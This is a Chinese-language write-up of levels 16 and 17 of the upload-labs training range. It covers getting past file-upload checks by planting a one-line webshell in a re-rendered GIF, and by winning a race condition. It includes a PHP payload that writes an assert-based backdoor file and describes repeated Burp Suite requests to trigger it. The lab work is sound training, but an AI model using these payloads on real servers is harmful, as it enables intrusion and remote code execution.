第十六關(guān)

第十七關(guān)

---

第十六關(guān)

直接上傳php文件判斷限制方式：

同第十五關(guān)白名單限制

第十六關(guān)源碼：

代碼邏輯判斷了后綴名、content-type，以及利用imagecreatefromgif判斷是否為gif圖片，最后再做了一次二次渲染

二次渲染圖片馬：upload-labs之pass 16詳細(xì)分析 - 先知社區(qū)

繞過(guò)思路：

1、把經(jīng)過(guò)二次渲染的圖片進(jìn)行捆綁webshell圖片馬，文件上傳時(shí)候 文件名為.gif后綴、文件類(lèi)型content-type:image/gif、文件頭GIF89a

推薦使用gif格式，十六進(jìn)制編輯圖片文件找到二次渲染未修改的圖片區(qū)域插入一句話(huà)木馬

第十七關(guān)

直接上傳php文件判斷限制方式：

第十七關(guān)源碼：

代碼邏輯：

• 這里先將文件上傳到服務(wù)器，然后通過(guò)rename修改名稱(chēng)，再通過(guò)unlink刪除文件，因此可以通過(guò)條件競(jìng)爭(zhēng)的方式在unlink之前，訪問(wèn)webshell

繞過(guò)思路：

1、條件競(jìng)爭(zhēng)繞過(guò)上傳webshell

上傳一個(gè)fputs寫(xiě)入shell文件功能的webshell，通過(guò)python或者burpsuite訪問(wèn)該文件

f.php文件內(nèi)容

<?php fputs(fopen('shell.php','w'),'<?php @assert($_POST[c]);?>'); ?>

burpsuite抓包：通過(guò)爆破形式不斷的進(jìn)行文件上傳

burpsuite抓包：通過(guò)爆破形式不斷的訪問(wèn)該文件